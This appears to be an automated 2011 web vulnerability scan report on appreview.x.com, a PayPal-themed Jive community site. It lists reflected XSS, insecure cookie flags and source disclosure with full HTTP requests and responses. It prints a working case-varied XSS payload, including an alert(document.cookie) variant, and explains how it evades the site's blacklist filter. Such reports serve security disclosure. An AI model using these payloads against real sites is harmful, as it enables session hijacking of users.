XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, appreview.x.com

Report generated by XSS.CX at Tue Sep 27 11:56:33 CDT 2011.


1. Cross-site scripting (reflected)

XSS in appreview.x.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

2. SSL cookie without secure flag set

2.1. https://appreview.x.com/

2.2. https://appreview.x.com/community/ppx/dev-tools

2.3. https://appreview.x.com/images/transparent.png

2.4. https://appreview.x.com/plugins/app-type-plugin/styles/app.css

2.5. https://appreview.x.com/plugins/borderless-widget-plugin/classes/borderless-widget.css

2.6. https://appreview.x.com/plugins/content-widgets/classes/community-widget.css

2.7. https://appreview.x.com/plugins/digg-style-voting/scripts/plugin.js

2.8. https://appreview.x.com/plugins/digg-style-voting/styles/plugin.css

2.9. https://appreview.x.com/plugins/i18n-html-widget-plugin/classes/borderless-widget.css

2.10. https://appreview.x.com/plugins/idea-type-plugin/resources/styles/idea.css

2.11. https://appreview.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

2.12. https://appreview.x.com/styles/jive-community.css

2.13. https://appreview.x.com/styles/jive-videomodule.css

2.14. https://appreview.x.com/themes/paypal/css/custom.css

2.15. https://appreview.x.com/themes/paypal/images/en/paypal_x_logo.gif

2.16. https://appreview.x.com/themes/paypal/images/favicon.png

2.17. https://appreview.x.com/wro/g3.css

3. Cookie without HttpOnly flag set

3.1. https://appreview.x.com/

3.2. https://appreview.x.com/community/ppx/dev-tools

3.3. https://appreview.x.com/images/transparent.png

3.4. https://appreview.x.com/plugins/app-type-plugin/styles/app.css

3.5. https://appreview.x.com/plugins/borderless-widget-plugin/classes/borderless-widget.css

3.6. https://appreview.x.com/plugins/content-widgets/classes/community-widget.css

3.7. https://appreview.x.com/plugins/digg-style-voting/scripts/plugin.js

3.8. https://appreview.x.com/plugins/digg-style-voting/styles/plugin.css

3.9. https://appreview.x.com/plugins/i18n-html-widget-plugin/classes/borderless-widget.css

3.10. https://appreview.x.com/plugins/idea-type-plugin/resources/styles/idea.css

3.11. https://appreview.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

3.12. https://appreview.x.com/styles/jive-community.css

3.13. https://appreview.x.com/styles/jive-videomodule.css

3.14. https://appreview.x.com/themes/paypal/css/custom.css

3.15. https://appreview.x.com/themes/paypal/images/en/paypal_x_logo.gif

3.16. https://appreview.x.com/themes/paypal/images/favicon.png

3.17. https://appreview.x.com/wro/g3.css

4. Source code disclosure

4.1. https://appreview.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

4.2. https://appreview.x.com/resources/scripts/gen/5d338e169408b250b56288770666021d.js

4.3. https://appreview.x.com/resources/scripts/gen/5e8daa65eff08c12130590779b690338.js

4.4. https://appreview.x.com/themes/paypal/js/custom.js

5. Cross-domain Referer leakage

5.1. https://appreview.x.com/community/ppx/dev-tools

5.2. https://appreview.x.com/search.jspa

6. Cross-domain script include

6.1. https://appreview.x.com/community/ppx/dev-tools

6.2. https://appreview.x.com/index.jspa

6.3. https://appreview.x.com/search.jspa

7. Email addresses disclosed

7.1. https://appreview.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

7.2. https://appreview.x.com/resources/scripts/gen/5d338e169408b250b56288770666021d.js

7.3. https://appreview.x.com/resources/scripts/gen/5e8daa65eff08c12130590779b690338.js

7.4. https://appreview.x.com/themes/paypal/js/custom.js

8. Cacheable HTTPS response

8.1. https://appreview.x.com/dwr/interface/Clearvote.js

8.2. https://appreview.x.com/themes/paypal/images/favicon.ico

9. Content type incorrectly stated



1. Cross-site scripting (reflected)  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /community/ppx/dev-tools

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c527d"><ScRiPt>alert(1)</ScRiPt>a270701d273 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request

GET /community/ppx/dev-tools?view=all&c527d"><ScRiPt>alert(1)</ScRiPt>a270701d273=1 HTTP/1.1
Host: appreview.x.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://appreview.x.com/community/ppx/dev-tools?view=test1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CCFCDCC48A75F97B14D776C4ACF6EBD7.node0; jive.server.info="serverName=appreview.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; BIGipServerpool_appreview.x.com_443=410566154.11555.0000; jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:53:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030333b; Expires=Thu, 27-Oct-2011 16:53:52 GMT; Path=/
Vary: Accept-Encoding,User-Agent
JP: D=251735 t=1317142432017885
Cache-Control: no-cache, private
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 144145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="/community/ppx/dev-tools?c527d"><ScRiPt>alert(1)</ScRiPt>a270701d273=1&amp;view=all&amp;start=0"
class="jive-pagination-current" >
...[SNIP]...

2. SSL cookie without secure flag set  previous  next
There are 17 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


2.1. https://appreview.x.com/  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://appreview.x.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: appreview.x.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 27 Sep 2011 16:53:00 GMT
Server: Apache-Coyote/1.1
Location: https://appreview.x.com/index.jspa
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=CCFCDCC48A75F97B14D776C4ACF6EBD7.node0; Path=/
Set-Cookie: jive.server.info="serverName=appreview.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; Version=1; Path=/
Vary: Accept-Encoding,User-Agent
JP: D=2020 t=1317142380491666
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=410566154.11555.0000; path=/


2.2. https://appreview.x.com/community/ppx/dev-tools  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /community/ppx/dev-tools

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/dev-tools?view=test1 HTTP/1.1
Host: appreview.x.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://appreview.x.com/index.jspa
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CCFCDCC48A75F97B14D776C4ACF6EBD7.node0; jive.server.info="serverName=appreview.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; BIGipServerpool_appreview.x.com_443=410566154.11555.0000

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:53:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030333b; Expires=Thu, 27-Oct-2011 16:53:25 GMT; Path=/
Vary: Accept-Encoding,User-Agent
JP: D=94032 t=1317142405217205
Cache-Control: no-cache, private
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 52366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.3. https://appreview.x.com/images/transparent.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /images/transparent.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/transparent.png HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:38 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: image/png
Content-Length: 100
JP: D=727 t=1317142478816287
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=393788938.11555.0000; path=/

.PNG
.
...IHDR.............(.4.....PLTE.......g......tRNS.@..f....IDATx.b`..0.....OmY.....IEND.B`.

2.4. https://appreview.x.com/plugins/app-type-plugin/styles/app.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /plugins/app-type-plugin/styles/app.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/app-type-plugin/styles/app.css HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:37 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/css
Content-Length: 16107
JP: D=796 t=1317142477281324
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=393788938.11555.0000; path=/

.jive-icon-app-sml {
background-image: url( ../images/app-12x12.gif);
background-position: 0 0;
}

.jive-icon-app-med {
background-image: url( ../images/app-16x16.gif);
background-posi
...[SNIP]...

2.5. https://appreview.x.com/plugins/borderless-widget-plugin/classes/borderless-widget.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /plugins/borderless-widget-plugin/classes/borderless-widget.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/borderless-widget-plugin/classes/borderless-widget.css HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:38 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/css
Content-Length: 488
JP: D=529 t=1317142478497531
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=377011722.11555.0000; path=/

/* Magical boderless widget */

#jive-widget-content .jive-widget-container .jive-widget-borderless .jive-widget-header {
display: none;
}

#jive-widget-content .jive-widget-container .jive-widget
...[SNIP]...

2.6. https://appreview.x.com/plugins/content-widgets/classes/community-widget.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /plugins/content-widgets/classes/community-widget.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/content-widgets/classes/community-widget.css HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:37 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/css
Content-Length: 1257
JP: D=771 t=1317142477256194
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=377011722.11555.0000; path=/

/* Magical boderless widget */

#jive-widget-content .jive-widget-container .jive-widget-borderless .jive-widget-header {
display: none;
}

#jive-widget-content .jive-widget-container .jive-widget
...[SNIP]...

2.7. https://appreview.x.com/plugins/digg-style-voting/scripts/plugin.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /plugins/digg-style-voting/scripts/plugin.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/digg-style-voting/scripts/plugin.js HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:36 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 4235
JP: D=552 t=1317142477243463
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=360234506.11555.0000; path=/

document.write('<script type="text/javascript" src="' + _jive_base_url + '/dwr/engine.js" ></script>');
document.write('<script type="text/javascript" src="' + _jive_base_url + '/dwr/interface/Clearv
...[SNIP]...

2.8. https://appreview.x.com/plugins/digg-style-voting/styles/plugin.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /plugins/digg-style-voting/styles/plugin.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/digg-style-voting/styles/plugin.css HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:37 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/css
Content-Length: 4524
JP: D=387 t=1317142477561867
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=410566154.11555.0000; path=/

.clearvote-container {
padding: 0;
overflow: hidden;
display: block;
float: right;
}

.clearvote-container .clearvote-table {
   border:0;
   border-collapse:collapse;
   float:non
...[SNIP]...

2.9. https://appreview.x.com/plugins/i18n-html-widget-plugin/classes/borderless-widget.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /plugins/i18n-html-widget-plugin/classes/borderless-widget.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/i18n-html-widget-plugin/classes/borderless-widget.css HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:38 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/css
Content-Length: 488
JP: D=776 t=1317142478577944
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=393788938.11555.0000; path=/

/* Magical boderless widget */

#jive-widget-content .jive-widget-container .jive-widget-borderless .jive-widget-header {
display: none;
}

#jive-widget-content .jive-widget-container .jive-widget
...[SNIP]...

2.10. https://appreview.x.com/plugins/idea-type-plugin/resources/styles/idea.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /plugins/idea-type-plugin/resources/styles/idea.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/idea-type-plugin/resources/styles/idea.css HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:37 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/css
Content-Length: 13894
JP: D=482 t=1317142477524567
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=410566154.11555.0000; path=/

body .jive-icon-idea-sml,
body .jive-icon-idea-med,
body .jive-icon-idea-big,
.voted-up .voted-arrow,
.voted-down .voted-arrow,
.vote-button {
   background-image: url(../images/j-ideas-sprites.png);
   _
...[SNIP]...

2.11. https://appreview.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:38 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 654029
JP: D=420 t=1317142478735923
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=410566154.11555.0000; path=/

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...

2.12. https://appreview.x.com/styles/jive-community.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /styles/jive-community.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/jive-community.css HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:38 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/css
Content-Length: 37406
JP: D=646 t=1317142478576093
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=360234506.11555.0000; path=/

/*
jive-community.css - styles for the community landing page.
*/


.jive-blog-post-message h3 {
   clear: both;
float: none;
}

/* container for use on the community pages */
#jive-b
...[SNIP]...

2.13. https://appreview.x.com/styles/jive-videomodule.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /styles/jive-videomodule.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/jive-videomodule.css HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:38 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/css
Content-Length: 30950
JP: D=630 t=1317142478624226
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=377011722.11555.0000; path=/

/* videomodule.css */
/* this stylesheet contains browser-specific styles for IE6 (* html) and IE7 (*+html) */

/* Styles for creating and editing a video post */
.jive-video {
clear: both;
bo
...[SNIP]...

2.14. https://appreview.x.com/themes/paypal/css/custom.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /themes/paypal/css/custom.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/paypal/css/custom.css HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
